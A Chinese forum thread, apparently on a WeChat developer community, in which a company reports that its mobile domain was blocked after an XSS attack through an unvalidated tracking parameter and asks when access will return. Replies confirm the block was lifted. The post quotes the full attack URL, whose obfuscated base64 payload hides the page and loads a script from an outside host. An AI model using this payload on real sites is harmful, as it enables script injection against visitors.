收藏
回答

m.cifnews.com 因XSS漏洞恶意攻击 导致被封 恢复访问时间是多久?

管理员:

您好,我们公司官网的域名因为跟踪参数origin没校验被人用XSS漏洞恶意攻击

现域名cifnews域名底下二级域名m.cifnew.com被封公司已连夜修复完漏洞。

公司是中国跨境电商领域的流量入口,在全球10多亿个网站中的排名为4000多名。现在处于疫情的紧急情况下,公司开展了跨境行业的战疫情,助力疫情等主题和活动, 而微信是公司一个重要的用户链接口,对公司影响非常大,希望能尽快解封,对应微信上的申请恢复访问的请求也已提交。

谢谢。

导致被封的链接如下:

https://m.cifnews.com/form/3659?origin=lunbo1234abce"})}}});new Function(atob(`ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0xO3Y9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7di5zcmM9Ii8vejIuZHVveGouY29tL3giO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQodik7dGhyb3cgMA==`))();new Vue({methods:{handle(d){axios.post("",{origin:"&ek=U2FsdGVkX1+lN7WjyoGFXMwqYyg/q2xC+SmfD3PpogN6SVO4YaIiVJtgtqdzjsG9B+Sd8Qi/Kt1xZzE/k5kdgw==&money=17785#1581427059155 


回答关注问题邀请回答
收藏

1 个回答

  • 灵芝
    灵芝
    2020-02-12

    你好,域名cifnew.com 可在微信正常访问,未被拦截,知悉。

    2020-02-12
    有用
    回复 2
    • 神经蛙
      神经蛙
      2020-02-12
      通过邮件的反馈,已恢复了,谢谢
      2020-02-12
      回复
    • 孙磊
      孙磊
      2020-02-25回复神经蛙
      你好,想问下之前你们反馈的邮箱是哪个?遇到同样问题
      2020-02-25
      回复
登录 后发表内容
问题标签